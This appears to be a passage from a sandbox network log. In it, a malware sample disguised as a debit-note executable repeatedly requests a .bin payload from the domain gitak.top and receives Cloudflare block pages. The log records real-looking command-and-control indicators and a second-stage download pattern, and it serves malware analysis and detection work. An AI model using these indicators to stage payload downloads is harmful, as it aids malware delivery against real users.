2024-08-26 13:37:50 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:37:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wJ7F8TAzPtGU62nzlY%2F9XR98dc5A2e4%2FYB%2Bz9vYj%2Bju48cTMy%2FLUbfsYDMjTloOXnWyBrdMCLgDk5IRpTZj0zJ1mxwtJIy9JEDOnmfmAMpU2o3XJfyyKpm8UgOc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9438030c3907cf-IAD
2024-08-26 13:37:50 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:37:50 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:37:50 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 46 5a 4b 38 70 31 69 72 58 72 62 79 55 79 5a 63 4c 55 35 6e 4a 4e 65 6e 4e 79 31 31 64 45 33 4c 49 4b 6d 61 57 70 7a 4f 78 35 34 2d 31 37 32 34 36 37 39 34 37 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="FZK8p1irXrbyUyZcLU5nJNenNy11dE3LIKmaWpzOx54-1724679470-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:37:50 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:37:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	49850	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:38:00 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:38:01 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:38:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJdM0dEpn2wivOm%2B695MCi0dnqWf5PpdTT2ZZTymzHMGVEsGAm4lEox%2BiRSaLk0pwkwxcTgC9DwdgI5Kz8MfFQsEjR6aLCf55wNf1q%2Fmifa4gLZOs01s2DNRsBY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94384499e907b5-IAD
2024-08-26 13:38:01 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:38:01 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:38:01 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 79 45 31 6b 42 41 70 47 61 4d 4b 4b 54 30 53 34 38 37 62 66 45 73 5f 43 4f 4e 32 66 58 69 49 34 62 44 48 4b 76 59 78 4e 50 76 38 2d 31 37 32 34 36 37 39 34 38 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="yE1kBApGaMKKT0S487bfEs_CON2fXiI4bDHKvYxNPv8-1724679481-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:38:01 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:38:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	49851	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:38:11 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:38:11 UTC	535	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:38:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QsNCW4gRwUSlIQbxkwWiFeJGTx0gqdvj674qNTdW%2FxD5PCCJ3ujAw4kamD7pHrq88dsnrpSp6KYd0aP5y9QCK6MhptqtOGVM76NW5WwjB1j2I3NlFJ3adnulxoM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9438863db7081e-IAD
2024-08-26 13:38:11 UTC	834	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:38:11 UTC	1369	IN	Data Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20 Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:38:11 UTC	1369	IN	Data Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 34 71 68 30 79 52 2e 39 63 45 73 48 68 42 46 34 48 6d 48 78 4d 61 48 55 42 5f 36 49 39 73 69 64 77 52 41 33 72 74 36 65 70 54 59 2d 31 37 32 34 36 37 39 34 39 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 Data Ascii: ut type="hidden" name="atok" value="4qh0yR.9cEsHhBF4HmHxMaHUB_6I9sidwRA3rt6epTY-1724679491-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
2024-08-26 13:38:11 UTC	846	IN	Data Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f Data Ascii: idden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
2024-08-26 13:38:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	49852	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:38:21 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:38:22 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:38:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wt%2BLPGWr64VRBnYXx1rfq2u0rAv3PVGjWvdMIvxhmfUnkdvaG3DwlVVL%2Ffb6W%2FbwIa56F%2Frfn439GWqxpGi1tyGTxIMMJxpGosRhgsLNQGuCspcDnLOEefh%2F30o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9438c7de3f0780-IAD
2024-08-26 13:38:22 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:38:22 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:38:22 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 51 69 43 33 68 30 65 63 32 38 39 30 78 6b 47 4f 39 63 4f 56 31 73 50 46 33 35 63 71 38 4d 4e 65 58 47 36 56 4f 67 35 55 33 45 49 2d 31 37 32 34 36 37 39 35 30 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="QiC3h0ec2890xkGO9cOV1sPF35cq8MNeXG6VOg5U3EI-1724679502-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:38:22 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:38:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	49853	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:38:32 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
